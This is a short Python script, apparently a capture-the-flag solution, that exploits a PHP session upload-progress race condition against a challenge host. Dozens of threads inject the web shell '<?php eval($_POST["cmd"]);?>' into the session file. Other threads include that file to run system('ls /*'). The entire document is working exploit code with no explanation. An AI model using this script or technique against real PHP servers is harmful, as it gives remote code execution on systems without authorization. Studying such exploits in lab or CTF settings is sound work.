| |
| import io |
| import requests |
| import threading |
| |
| sessid = 'flag1' |
| data = {"cmd": "system('ls /*');"} |
| url = "http://eci-2zecwqnaa4xrrmmwpqir.cloudeci1.ichunqiu.com/" |
| |
| def write(session): |
| while True: |
| f = io.BytesIO(b'a' * 1024 * 50) |
| resp = session.post(url, |
| data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>maxzed'}, |
| files={'file': ('tgao.txt', f)}, cookies={'PHPSESSID': sessid}) |
| |
| def read(session): |
| while True: |
| resp = session.post(url+'?name=cfile&value=/tmp/sess_' + sessid, |
| data=data) |
| if 'maxzed' in resp.text: |
| print(resp.text) |
| event.clear() |
| else: |
| pass |
| |
| if __name__ == "__main__": |
| event = threading.Event() |
| with requests.session() as session: |
| for i in range(1, 30): |
| threading.Thread(target=write, args=(session,)).start() |
| |
| for i in range(1, 30): |
| threading.Thread(target=read, args=(session,)).start() |
| event.set() |